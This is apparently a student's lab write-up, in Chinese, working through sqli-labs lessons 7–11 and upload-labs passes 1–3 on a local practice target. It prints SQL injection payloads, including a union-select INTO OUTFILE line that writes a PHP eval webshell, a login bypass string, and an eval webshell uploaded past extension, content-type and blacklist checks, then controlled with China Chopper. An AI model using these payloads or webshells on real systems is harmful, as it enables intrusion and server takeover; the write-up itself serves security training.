实训第三天记录-sqli-lab7-11+upload-lab1-3

一、sqli-labs: less7-11

  1. less8-GET-Blind-Boolian Based - Single Quotes

    1. 首先分别用id=1’和 id=1"进行测试

      实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3

      输入1’和1"结果不同,显然是字符型,然后思考,按理说若闭合符错误应产生错误信息压制了,但是可以肯定当闭合符错误时不会产生任何信息。且猜测sql语句为:select xxx from xxx where id='1’

      当我们输入1’时,sql语句为select xxx from xxx where id=‘1’’,显然此时多了一个’,sql语句会报错,当我们输入1’%23(即#)时,sql语句为select xxx from xxx where id=‘1’#’,此时,后面的’被注释掉,不会报错,如下图,因此我们判断闭合符为’。注意当输入id=1"%23时依然能照常执行,此时sql语句为select xxx from xxx where id=‘1"#’,理解为闭合符优先级高于#,所以此时#不再当为注释符处理,而是普通字符。

      实训第三天记录-sqli-lab7-11+upload-lab1-3
    2. 接下来进行布尔盲注

      实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3

      采用二分法爆破数据库名长度

      实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3

      由此判断位数为8,接下来依次使用二分法爆破每一位的字母

      实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3

      由此可得第一位字母ascii码为115(base10),为s,接下来利用相同的方法爆破其他位依次为ecurity

  2. less9-GET-Blind-Time Based -Single Quotes

    1. 首先用id=1’和id=1"进行测试,发现都会显示You are in…,故猜测要么为数字型,要么是由于程序设计原因无论sql语句正确与否都显示You are in…

      实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3
    2. 利用sleep函数进行延时注入,首先判断参数类型和闭合符,发现id=1’时网页转了几秒后才返回,而id=1"时,网页立刻返回,这说明,id=1"时sql语句报错,故可以立即返回,而id=1’时,可以查询到结果,故3秒后返回。所以判断’为闭合符,道理同less8中相同

      实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3
    3. 在b的基础上添加and条件爆破信息

      实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3

      得出库名为8位

      实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3

      得出第一个字母为s,其余位按照同样的方法爆破出ecurity

  3. less7-Dump into Outfile

    1. 首先修改my.ini文件

      实训第三天记录-sqli-lab7-11+upload-lab1-3
    2. 判断闭合符

      实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3

      故判断闭合符为’))

    3. 利用联合查询注入小马

      ?id=1’)) union select 1,2,"<?php eval($_GET['cmd'])?>" into outfile ‘c:/phpstudy/www/shell.php’%23

      注意windows路径不区分大小写

      虽然语句报错,但可以发现shell.php确实成功写入

      实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3

      木马执行成功

  4. less10-GET-Blind-Time Based -Double Quotes

    与less9思路相同,只不过闭合符由单引号变为了双引号,故不再赘述。猜测闭合符时若单双引号都不是,在引号后面加若干右括号进行测试

  5. less11-Error Based-String

    1. 在密码框中测试闭合符

      实训第三天记录-sqli-lab7-11+upload-lab1-3

      发现闭合符就是’

    2. 猜测和构造sql语句 select xxx from t_users where uname=‘xxx’ and pass='yyy’

      构造select xxx from t_users where uname=‘xxx’ and pass='yyy’or 1#'

      用户名随意输入,在密码框中输入**yyy’ or 1#**后结果为下图,可以看出显示了一条查询结果,但实际上后端查询结果是user表的所有记录,只是在前端只渲染了一条记录。那我们该如何获取所有记录呢?

      实训第三天记录-sqli-lab7-11+upload-lab1-3

      一种方法是通过limit m,n来限定查询结果从而获得每一条记录,如下图,输入**yyy’ or 1 limit 1,1#**后结果为

      实训第三天记录-sqli-lab7-11+upload-lab1-3

二、upload-labs1-3

  1. pass-01(前端js验证文件后缀名)

    实训第三天记录-sqli-lab7-11+upload-lab1-3
    1. 首先尝试上传shell.php,内容为:

      <?php  	echo "I've got a shell"; 	eval($_REQUEST 	['cmd']); ?> 

      发现不允许上传

      实训第三天记录-sqli-lab7-11+upload-lab1-3
    2. 通过burpsuite拦截改包,将jpg改为php,然后将拦截放开,可以看到木马上传成功

      实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3
    3. 利用中国菜刀控制被攻击机

      添加木马url

      实训第三天记录-sqli-lab7-11+upload-lab1-3

      可以看到已经可以进入被攻击机

      实训第三天记录-sqli-lab7-11+upload-lab1-3
    4. 在桌面上新建以自己姓名学号命名的文件,进入桌面路径,在空白区域右击新建文件即可

      实训第三天记录-sqli-lab7-11+upload-lab1-3

      可以看到已经新建了一个文件,将其名字进行修改即可

      实训第三天记录-sqli-lab7-11+upload-lab1-3
    5. 查看靶机ip

      右击进入虚拟终端执行ipconfig命令

      实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3
  2. pass-02(限制content-type)

    实训第三天记录-sqli-lab7-11+upload-lab1-3
    1. 查看php源码,发现只允许上传三种类型的文件

      实训第三天记录-sqli-lab7-11+upload-lab1-3
    2. 上传shell.php,内容为:

      <?php  	echo "I've got a shell"; 	eval($_REQUEST 	['cmd']); ?> 

      利用burpsuite抓包改包,将content-type改为image/png

      实训第三天记录-sqli-lab7-11+upload-lab1-3

      此时可发现小马已上传成功

      实训第三天记录-sqli-lab7-11+upload-lab1-3
  3. pass-03

    1. 查看源码可知,该文件上传验证为后端黑名单过滤,故考虑绕过黑名单

      实训第三天记录-sqli-lab7-11+upload-lab1-3
    2. 查看apache的配置文件httpd.conf,发现除了php后缀名,还可以上传phtml后缀名的文件,要把前面的#删除,并重启服务

      实训第三天记录-sqli-lab7-11+upload-lab1-3
    3. 尝试上传shell.phtml,上传成功

      实训第三天记录-sqli-lab7-11+upload-lab1-3 实训第三天记录-sqli-lab7-11+upload-lab1-3
版权声明:玥玥 发表于 2021-07-25 13:33:21。
转载请注明:实训第三天记录-sqli-lab7-11+upload-lab1-3 | 女黑客导航